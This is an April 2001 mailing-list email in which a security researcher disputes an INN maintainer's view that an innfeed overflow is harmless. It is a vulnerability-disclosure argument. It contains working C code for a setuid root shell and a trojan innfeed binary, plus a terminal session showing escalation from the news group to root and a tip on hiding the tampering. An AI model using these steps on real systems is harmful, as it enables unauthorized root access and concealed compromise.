(not an) innfeed vulnerability

Thu Apr 12 19:38:39 UTC 2001

Russ Allbery wrote:

> Well, I don't understand the point of your advisory, and yet again I would
> like to repeat that this does not constitute a security hole.  Issuing a
> security advisory for it therefore doesn't make any sense.

But I think it is and I shall explain within this email

> I told you that if you found a security hole, we'd be happy to work with
> you on an advisory, but this still isn't a security hole.
> 
> Thank you for the patch, though.  It will be in the next release of INN,
> since it does fix a quality of implementation issue.

No Problem .. =)

> How can he then further upgrade his privileges?  I don't believe that this
> is the case; please show me an example.

Ok here is the example, the only thing that is required is that root 
runs innfeed as a cron job or manually, wich is done by some 
administrators ...

nahual at shell:~$ id
uid=1001(nahual) gid=100(users) groups=100(users),13(news)
nahual at shell:~$ cat mine.c
#include <stdio.h>
#include <unistd.h>

int main(void) {
  setuid(0);
  setgid(0);
  execl("/bin/sh", "/bin/sh", NULL);
  return 0;
}
nahual at shell:~$ cat trojan-innfeed.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int main(void) {
  system("chown root.root /tmp/mine");
  system("chmod 4111 /tmp/mine");
  return 0;
}
nahual at shell:~$ cp mine /tmp/
nahual at shell:~$ ls -al /tmp/mine
-rwxr-xr-x   1 nahual   users       11869 Apr 12 21:20 /tmp/mine*
nahual at shell:~$ cp trojan-innfeed /tmp/
nahual at shell:~$ ./x-innfeed
[ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]
------------------------------------------------------------
[ + ] Found by:

[ + ] Alex Hernandez (alex.hernandez at defcom.com)
[ + ] Enrique Sanchez (@defcom.com ... Yes is just @defcom.com)
[ + ] Defcom Labs @ Spain ....
[ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)

[ + ] Using address 0xbffff9c4
[ + ] Starting exploitation ...

bash$ id
uid=9(news) gid=13(news) groups=100(users),13(news)
bash$ cd /usr/lib/news/bin/
bash$ cp innfeed innfeed2
bash$ chmod 777 innfeed
bash$ cp /tmp/trojan-innfeed innfeed
bash$ ls innfeed2
innfeed2
bash$ ls -l innfeed2
-r-xr-x---   1 news     news       213124 Apr 12 21:21 innfeed2
bash$ chmod 550 innfeed
bash$ ls -l innfeed
-r-xr-x---   1 news     news        11714 Apr 12 21:22 innfeed
bash$

--- NOW ROOT EXECUTES THIS ON A CRON OR SOMETHING LIKE THAT ---

root at shell:~# /usr/lib/news/bin/innfeed
root at shell:~#

--- The user logs in again ---

nahual at shell:~$ ls -al /tmp/mine
---s--x--x   1 root     root        11869 Apr 12 21:20 /tmp/mine*
nahual at shell:~$ /tmp/mine
root at shell:~# id
uid=0(root) gid=0(root) groups=100(users),13(news)
root at shell:~#

----

 From here if the attacker then changes the binary back and puts the 
chmod 550 to it the administrator will not notice he has been hacked ...

> 
> Furthermore, you can only get news UID if you already have news GID:

Yeah but that is an escalation of priviledges even if its not root as I 
have explained before, it really doesn't have to go all the way to root 
to be a security hole it can be used as a trampolin to trojan or use 
another exploit if there was any other one.

> and there are innumerable other ways of getting news UID if you have news
> GID if you're running INN 2.2.  If you're running INN 2.3, your exploit
> won't run unless you're *already* news UID, in which case the whole thing
> is an extremely complicated way of spawning a new shell with your existing
> privileges.

I'm calling startinnfeed, I have tried this with 2.3.1, startinnfeed is 
4550 owner root group news so I can still call that instead of innfeed 
since its news.news 500 on a secure manner, startinnfeed does a 
setuid(news) and in there is where i can then gain news uid.

> I appreciate the work that you're trying to do here, but you need to make
> sure that you have all of your facts accurate.

That is true, as far as I have been exploiting this it works, its true 
is not an automatic root but I still think it can be leveraged to gain 
further access. Any ideas? as far as I can tell it is a security hole 
since you are able to gain an uid is not yours.

Enrique A. Sanchez Montellano
Chief Technical Officer Defcom Spain
+(34) 91 3080175

> 